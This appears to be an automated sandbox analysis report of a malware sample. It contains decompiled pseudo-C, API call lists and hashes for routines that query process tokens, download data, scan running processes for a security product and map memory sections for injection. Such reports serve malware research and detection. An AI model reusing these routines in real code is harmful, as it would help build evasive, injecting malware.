				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E049F4DF6(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E049F4C73(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                            0x049f46a2
                                            0x049f46a3
                                            0x049f46a4
                                            0x049f46a5
                                            0x049f46a6
                                            0x049f46aa
                                            0x049f46b1
                                            0x049f46c0
                                            0x049f46c3
                                            0x049f46c6
                                            0x049f46cd
                                            0x049f46d0
                                            0x049f46d3
                                            0x049f46d6
                                            0x049f46d9
                                            0x049f46e4
                                            0x049f46e6
                                            0x049f46ef
                                            0x049f46f7
                                            0x049f46f9
                                            0x049f470b
                                            0x049f4715
                                            0x049f4719
                                            0x049f4728
                                            0x049f472c
                                            0x049f4735
                                            0x049f473d
                                            0x049f473d
                                            0x049f473f
                                            0x049f473f
                                            0x049f4747
                                            0x049f474d
                                            0x049f4751
                                            0x049f4751
                                            0x049f475c

                                            APIs
                                            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 049F46DC
                                            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 049F46EF
                                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 049F470B
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 049F4728
                                            • memcpy.NTDLL(?,00000000,0000001C), ref: 049F4735
                                            • NtClose.NTDLL(?), ref: 049F4747
                                            • NtClose.NTDLL(00000000), ref: 049F4751
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                            • String ID:
                                            • API String ID: 2575439697-0
                                            • Opcode ID: fe7e0f82e2aff38019fe79765948c8850d556b9d5eb38694b056a2c490f58d08
                                            • Instruction ID: f8eac861fabde1c3fe3f87b4e1b2e1a1729608d0d35b91f38c0eace4f7c0ab29
                                            • Opcode Fuzzy Hash: fe7e0f82e2aff38019fe79765948c8850d556b9d5eb38694b056a2c490f58d08
                                            • Instruction Fuzzy Hash: 5521E6B2900228BBDB01AF95CC85ADEBFBDEF98750F104026FA05A6120D7719A449BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058212F1 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 05821338
                                            • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0582134B
                                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 05821367
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 05821384
                                            • memcpy.NTDLL(?,00000000,0000001C), ref: 05821391
                                            • NtClose.NTDLL(?), ref: 058213A3
                                            • NtClose.NTDLL(?), ref: 058213AD
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                            • String ID:
                                            • API String ID: 2575439697-0
                                            • Opcode ID: fc8513adde67eb4b55706700899ab9e3e34e1d38ef2da4059289dca0e61dbb16
                                            • Instruction ID: 8cfa9a79b1533b3d3a06c5f1e80221386d0dbf7dadd75e6486d8f214362c4fc6
                                            • Opcode Fuzzy Hash: fc8513adde67eb4b55706700899ab9e3e34e1d38ef2da4059289dca0e61dbb16
                                            • Instruction Fuzzy Hash: D121FA72A10228BBDF119F95CC499DEBFBDEF08740F108116F905E6160D7719A85DFA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F4CC6 Relevance: 9.1, APIs: 6, Instructions: 112filenetworkCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 70%
                                            			E049F4CC6(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				int _t43;
				long _t45;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				if(InternetReadFile( *(_t59 + 0x18),  &_v20, 4,  &_v8) != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x49fa174(0, 1,  &_v12); // executed
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E049F4DF6(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_t43 = InternetReadFile( *(_t59 + 0x18), _v16, 0x1000,  &_v8); // executed
						if(_t43 != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E049F4C73(_v16);
							if(_t58 == 0) {
								_t45 = E049F56EC(_v12, _t59); // executed
								_t58 = _t45;
							}
							goto L18;
						}
						_t58 = E049F3A6F( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E049F3A6F( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}
















                                            0x049f4cc6
                                            0x049f4cd5
                                            0x049f4cda
                                            0x049f4cdc
                                            0x049f4cf3
                                            0x049f4d24
                                            0x049f4d29
                                            0x049f4dec
                                            0x049f4def
                                            0x049f4df5
                                            0x049f4df5
                                            0x049f4d36
                                            0x049f4d3e
                                            0x049f4de9
                                            0x00000000
                                            0x049f4de9
                                            0x049f4d49
                                            0x049f4d4e
                                            0x049f4d53
                                            0x049f4ddb
                                            0x049f4ddc
                                            0x049f4ddc
                                            0x049f4de2
                                            0x00000000
                                            0x049f4de2
                                            0x049f4d59
                                            0x049f4d5b
                                            0x049f4d61
                                            0x049f4d62
                                            0x049f4d62
                                            0x049f4d65
                                            0x049f4d68
                                            0x049f4d6e
                                            0x049f4d7f
                                            0x049f4d87
                                            0x00000000
                                            0x00000000
                                            0x049f4d8f
                                            0x049f4d97
                                            0x049f4dc0
                                            0x049f4dc3
                                            0x049f4dca
                                            0x049f4dd0
                                            0x049f4dd5
                                            0x049f4dd5
                                            0x00000000
                                            0x049f4dca
                                            0x049f4da3
                                            0x049f4da7
                                            0x00000000
                                            0x00000000
                                            0x049f4da9
                                            0x049f4dae
                                            0x00000000
                                            0x00000000
                                            0x049f4db0
                                            0x049f4db0
                                            0x049f4db5
                                            0x00000000
                                            0x00000000
                                            0x049f4db7
                                            0x049f4db8
                                            0x049f4dbb
                                            0x049f4dbb
                                            0x049f4d62
                                            0x049f4cfb
                                            0x049f4d03
                                            0x049f4d1c
                                            0x049f4d1e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f4d1e
                                            0x049f4d0f
                                            0x049f4d13
                                            0x00000000
                                            0x00000000
                                            0x049f4d19
                                            0x00000000

                                            APIs
                                            • ResetEvent.KERNEL32(?), ref: 049F4CDC
                                            • InternetReadFile.WININET(?,?,00000004,?), ref: 049F4CEB
                                            • GetLastError.KERNEL32 ref: 049F4CF5
                                              • Part of subcall function 049F3A6F: WaitForMultipleObjects.KERNEL32(00000002,049F7B35,00000000,049F7B35,?,?,?,049F7B35,0000EA60), ref: 049F3A8A
                                            • ResetEvent.KERNEL32(?), ref: 049F4D6E
                                            • InternetReadFile.WININET(?,?,00001000,?), ref: 049F4D7F
                                            • GetLastError.KERNEL32 ref: 049F4D89
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: ErrorEventFileInternetLastReadReset$MultipleObjectsWait
                                            • String ID:
                                            • API String ID: 3290165071-0
                                            • Opcode ID: 327e5762edd48a0bf773811ab5c7922e309217542f2cfcda09d03a4f1dcb84f9
                                            • Instruction ID: 04e8a71c6d18a37c1413f3be4fae7c823c954f86fefc29f6325a9e74c07c9fe5
                                            • Opcode Fuzzy Hash: 327e5762edd48a0bf773811ab5c7922e309217542f2cfcda09d03a4f1dcb84f9
                                            • Instruction Fuzzy Hash: F831AE36A00604BFDB22AFA4DC44BAFB7BAEF94364F154538E615D7190EB30F9018B10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05815CA1 Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05815CCC
                                            • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 05815CD9
                                            • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 05815D65
                                            • GetModuleHandleA.KERNEL32(00000000), ref: 05815D70
                                            • RtlImageNtHeader.NTDLL(00000000), ref: 05815D79
                                            • RtlExitUserThread.NTDLL(00000000), ref: 05815D8E
                                              • Part of subcall function 0581199F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05815D07,?), ref: 058119A7
                                              • Part of subcall function 0581199F: GetVersion.KERNEL32 ref: 058119B6
                                              • Part of subcall function 0581199F: GetCurrentProcessId.KERNEL32 ref: 058119D2
                                              • Part of subcall function 0581199F: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 058119EF
                                              • Part of subcall function 0580685A: memcpy.NTDLL(00000000,?,?,?), ref: 058068B9
                                              • Part of subcall function 05803AEB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0581A192), ref: 05803B11
                                              • Part of subcall function 05804345: GetModuleHandleA.KERNEL32(?,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000,?), ref: 05804366
                                              • Part of subcall function 05804345: GetProcAddress.KERNEL32(00000000,?), ref: 0580437F
                                              • Part of subcall function 05804345: OpenProcess.KERNEL32(00000400,00000000,69B25F44,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?), ref: 0580439C
                                              • Part of subcall function 05804345: IsWow64Process.KERNEL32(?,00000000,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000), ref: 058043AD
                                              • Part of subcall function 05804345: FindCloseChangeNotification.KERNEL32(?,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000,?), ref: 058043C0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
                                            • String ID:
                                            • API String ID: 2581485877-0
                                            • Opcode ID: 61c301c856c829593b1fb97003b1ff6cda72a4e107b08af99e48c7110f9c93a1
                                            • Instruction ID: 90995251fda7c132d3608a0f6a7beb19799ce6bf639d74427f5a21334e0e3808
                                            • Opcode Fuzzy Hash: 61c301c856c829593b1fb97003b1ff6cda72a4e107b08af99e48c7110f9c93a1
                                            • Instruction Fuzzy Hash: 6C318171A10214AFCB21AF68DC89EBE7FB9FB84650B108138FD16E7150DA349D44CF65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F6DB6 Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E049F6DB6() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x49fa348; // 0x57d5a8
						_t2 = _t9 + 0x49fbea8; // 0x73617661
						_push( &_v264);
						if( *0x49fa12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                                            0x049f6dc1
                                            0x049f6dc6
                                            0x049f6dcb
                                            0x049f6dcf
                                            0x049f6dd9
                                            0x049f6e0a
                                            0x049f6de0
                                            0x049f6de5
                                            0x049f6df2
                                            0x049f6dfb
                                            0x049f6e12
                                            0x049f6dfd
                                            0x049f6e05
                                            0x00000000
                                            0x049f6e05
                                            0x049f6e13
                                            0x049f6e14
                                            0x00000000
                                            0x049f6e14
                                            0x00000000
                                            0x049f6e0e
                                            0x049f6e1a
                                            0x049f6e1f

                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 049F6DC6
                                            • Process32First.KERNEL32(00000000,?), ref: 049F6DD9
                                            • Process32Next.KERNEL32(00000000,?), ref: 049F6E05
                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 049F6E14
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 3243318325-0
                                            • Opcode ID: 08ab724e9c28306dc303a0c50d244ba3cd3b29ada71848955fb190227c2e5ae4
                                            • Instruction ID: c73cede9eb3a2ba7b234ff700a5c2be6a476601bb9b62c15e24dace1cfe60ba0
                                            • Opcode Fuzzy Hash: 08ab724e9c28306dc303a0c50d244ba3cd3b29ada71848955fb190227c2e5ae4
                                            • Instruction Fuzzy Hash: 7CF030736052246ADB20AA76DC4CEEB76ACDBC5758F010171EF49D2100EA74EDA687A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058144A5 Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcAddress.KERNEL32(?,00000318), ref: 058144CA
                                            • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 058144E6
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                              • Part of subcall function 05801C78: GetProcAddress.KERNEL32(?), ref: 05801CA1
                                              • Part of subcall function 05801C78: NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,?), ref: 05801CC3
                                            • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000100,00000200), ref: 05814650
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                                            • String ID:
                                            • API String ID: 3547194813-0
                                            • Opcode ID: 43e39f471050e2ef72a676ef1f4bf3b1e5b677bd994d5027c2ceeeea1e9ae9c3
                                            • Instruction ID: e1ec24c85c319dca0212d122bfb8510470f7fcdb31464db6b7f7f0ceaeec5a7b
                                            • Opcode Fuzzy Hash: 43e39f471050e2ef72a676ef1f4bf3b1e5b677bd994d5027c2ceeeea1e9ae9c3
                                            • Instruction Fuzzy Hash: 03612E71A00606AFEF14DF99C884AAEBBB8FF08314F104129ED15E7251DB70ED50CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581F5FF Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.NTDLL ref: 0581F613
                                            • GetProcAddress.KERNEL32(?), ref: 0581F63B
                                            • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 0581F659
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressInformationProcProcess64QueryWow64memset
                                            • String ID:
                                            • API String ID: 2968673968-0
                                            • Opcode ID: 51e8118a1f3c6f776519ae6b6a9123278a81dc93d4a1d6d54166f10436983352
                                            • Instruction ID: b7f83d9b9bc32035976cf7c9b7bc7f824193e2776c54023770eeb8396a663fc9
                                            • Opcode Fuzzy Hash: 51e8118a1f3c6f776519ae6b6a9123278a81dc93d4a1d6d54166f10436983352
                                            • Instruction Fuzzy Hash: C6118F71A10209AFDB10DB95DC19F997BACEB44700F058024FE04EB290EB30AD05CB74
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F25D7 Relevance: 3.1, APIs: 2, Instructions: 70nativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 72%
                                            			E049F25D7(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E049F3A9C(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                            0x049f25e0
                                            0x049f25e7
                                            0x049f25e8
                                            0x049f25e9
                                            0x049f25ea
                                            0x049f25eb
                                            0x049f25fc
                                            0x049f2600
                                            0x049f2614
                                            0x049f2617
                                            0x049f261a
                                            0x049f2621
                                            0x049f2624
                                            0x049f262b
                                            0x049f262e
                                            0x049f2631
                                            0x049f2634
                                            0x049f2639
                                            0x049f2674
                                            0x049f263b
                                            0x049f263e
                                            0x049f2644
                                            0x049f2649
                                            0x049f264d
                                            0x049f266b
                                            0x049f264f
                                            0x049f2656
                                            0x049f2664
                                            0x049f2664
                                            0x049f264d
                                            0x049f267c

                                            APIs
                                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,049F759F), ref: 049F2634
                                              • Part of subcall function 049F3A9C: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,049F2649,00000002,00000000,?,?,00000000,?,?,049F2649,00000000), ref: 049F3AC9
                                            • memset.NTDLL ref: 049F2656
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Section$CreateViewmemset
                                            • String ID:
                                            • API String ID: 2533685722-0
                                            • Opcode ID: d9d64a364fb024a8bbd88631a5c423510446b5b41a7fba1de82a375655f3b97f
                                            • Instruction ID: c78791dfdba6af43690801b2cd273a63df905d45e949f081e91eeabf47ff089a
                                            • Opcode Fuzzy Hash: d9d64a364fb024a8bbd88631a5c423510446b5b41a7fba1de82a375655f3b97f
                                            • Instruction Fuzzy Hash: C3211DB5D00209AFDB11DFA9C8849DEFBB9FF48354F10887AE615F7210D731AA458BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05801C78 Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcAddress.KERNEL32(?), ref: 05801CA1
                                            • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,?), ref: 05801CC3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressMemory64ProcReadVirtualWow64
                                            • String ID:
                                            • API String ID: 752694512-0
                                            • Opcode ID: fcd8a0b2c70e01adf9c2c0e1522e481e139471e724b4af1dcb558d6ebca42b21
                                            • Instruction ID: 332f9581b0b4582b79a642e7ddb7fa6c5bfc6e42d135aacbe6113718cdff740e
                                            • Opcode Fuzzy Hash: fcd8a0b2c70e01adf9c2c0e1522e481e139471e724b4af1dcb558d6ebca42b21
                                            • Instruction Fuzzy Hash: F9F04975610109BFCB119F8ADC49C9EBFBAFB88320B108119FD04C2220DB31E990DB20
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F3A9C Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E049F3A9C(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                            0x049f3aae
                                            0x049f3ab4
                                            0x049f3ac2
                                            0x049f3ac9
                                            0x049f3ace
                                            0x049f3ad4
                                            0x00000000
                                            0x049f3ad5
                                            0x00000000

                                            APIs
                                            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,049F2649,00000002,00000000,?,?,00000000,?,?,049F2649,00000000), ref: 049F3AC9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: SectionView
                                            • String ID:
                                            • API String ID: 1323581903-0
                                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                            • Instruction ID: ef985a48e460dc9d65110b17b5a2f9ae26a6e517846d3610bb3a071e38c88a1e
                                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                            • Instruction Fuzzy Hash: BAF012B5A0420CBFDB119FA5CC85C9FBBBDEB44355B104979B652E1190D630AE089B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05815D9D Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,05829420), ref: 05815DB4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID:
                                            • API String ID: 1778838933-0
                                            • Opcode ID: ca3caaab4a1a670ed599014710dea2b42f27382c0a531038e87079528e5fa62e
                                            • Instruction ID: 73c0ced0f09e10d1e46f60451f32fc631a5f92abf797ab2dcb319f187cd4334c
                                            • Opcode Fuzzy Hash: ca3caaab4a1a670ed599014710dea2b42f27382c0a531038e87079528e5fa62e
                                            • Instruction Fuzzy Hash: 48F034313001299F8B20DE5ACC89EAABBADFB45794B218164ED01DB260D620EE45CBE4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F636D Relevance: 36.2, APIs: 24, Instructions: 214memorystringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            C-Code - Quality: 68%
                                            			E049F636D(long __eax, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v52;
				void* __ecx;
				void* __edi;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t37;
				intOrPtr _t38;
				int _t41;
				void* _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t66;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t82;
				int _t85;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				int _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
